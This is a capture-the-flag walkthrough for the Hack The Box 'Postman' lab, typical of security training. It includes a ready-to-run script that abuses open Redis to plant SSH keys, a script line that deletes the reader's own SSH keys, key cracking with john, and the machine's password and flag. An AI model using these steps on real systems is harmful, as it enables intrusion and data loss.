Hack The Box Postman


Lets find some services and ports we can work with.

 nmap 10.10.10.160

The service Redis on port 6379 looks like the best approach to get an initial foothold. Using telnet we should be able to connect through Redis service so we can enumerate more.

telnet 10.10.10.160 6379

That should of opened a connection, to view some information about Redis we can simply type “info”

telnet 10.10.10.160 6379
Trying 10.10.10.160...
Connected to 10.10.10.160.
Escape character is '^]'.
info

Now we need exploit Redis service by uploading our own ssh key, I will add details of what is exactly going on at a later date.

Below Ive created a handy script to automate the entire process, just copy the below text and save it on your local machine, make it executable and run the script.

cd ~/.ssh
#copy the bash text into bamboohax.sh
nano bamboohax.sh 
#save and exit
#make executable
chmod +x bamboohax.sh
#run the script
./bamboohax.sh
#Created by bamboohax                                         
#!/bin/bash 
rm /root/.ssh/id* 
ssh-keygen -t rsa 
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > bamboohax
redis-cli -h 10.10.10.160 flushall 
cat bamboohax | redis-cli -h 10.10.10.160 -x set crackit 
redis-cli -h 10.10.10.160 config set dir /var/lib/redis/.ssh 
redis-cli -h 10.10.10.160 config set dbfilename 'authorized_keys' 
redis-cli -h 10.10.10.160 save 
ssh -i /root/.ssh/id_rsa redis@10.10.10.160
Now that we have a low privilege shell finding the other user should be easy, looking in the /home directory we see the user Matt.
After searching through the filesystem I found backup of ssh private key.
cd /opt
ls
id_rsa.bak
cat id_rsa.bak 

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----

To view the password we need to bruteforce that key but first we need to convert the key so the password cracker can read it. base64 is what we need it to be.

redis@Postman:/opt$ base64 id_rsa.bak > ~/Matt-ssh

copy content of Matt-ssh and paste it into a file on your local machine, I created a file on my Desktop, Now we can convert it to a usable format for our cracker to do its thing

root@kali:/usr/share/john# python ssh2john.py ~/Desktop/Matt-ssh >~/Desktop/crack.txt
Using the tool john, we can brute-force the password 
root@kali:~/Desktop# john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (/root/Desktop/Matt-ssh)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:09 DONE (2020-02-23 05:02) 0.1035g/s 1484Kp/s 1484Kc/s 1484KC/sa6_123..*7¬°Vamos!
Session complete
Now we have a password, lets try ssh as user Matt using the password we brute-forced
redis@Postman:~$ su Matt
Password: 
Matt@Postman:/var/lib/redis$ 

Yes it worked, a quick look around and we have the user.txt file needed to complete the user part.

Matt@Postman:/var/lib/redis$ cd
Matt@Postman:~$ ls
user.txt
Matt@Postman:~$ cat user.txt 
517ad0ec2458ca97af8d93aac08a2f3c

Leave a Comment